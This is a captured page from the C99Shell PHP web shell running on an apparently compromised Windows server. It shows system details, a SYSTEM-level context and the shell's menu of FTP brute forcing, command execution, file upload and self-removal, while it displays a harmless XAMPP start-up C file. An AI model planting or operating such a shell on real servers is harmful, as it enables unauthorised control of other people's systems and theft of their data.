!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\dmz\src\xampp-start-stop\   drwxrwxrwx
Free 4.15 GB of 39.52 GB (10.5%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xampp_start.c (796 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// Copyright (C) 2007-2010 Kai Seidler, oswald@apachefriends.org, GPL-licensed

#include 
#include 
#include 

#include "xampp_util.h"

int main(int argc, char **argv)
{
	char buffer[200];
	char *start[10][10] = {
				{"apache\\bin\\httpd.exe", "-f conf\\httpd.conf", NULL},
				{"mysql\\bin\\mysqld.exe", "--defaults-file=mysql\\bin\\my.ini", "--standalone",  NULL},
				{NULL}
			};

	printf("\nXAMPP now starts as a console application.\n\n");

	printf("Instead of pressing Control-C in this console window, please use xampp_stop.exe\n");
	printf("to stop XAMPP, because it lets XAMPP end any current transactions and cleanup\n");
	printf("gracefully.\n\n");


	xampp_cdx();

	xampp_call(start);
	
	Sleep(10000);


	return(0);
}

bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--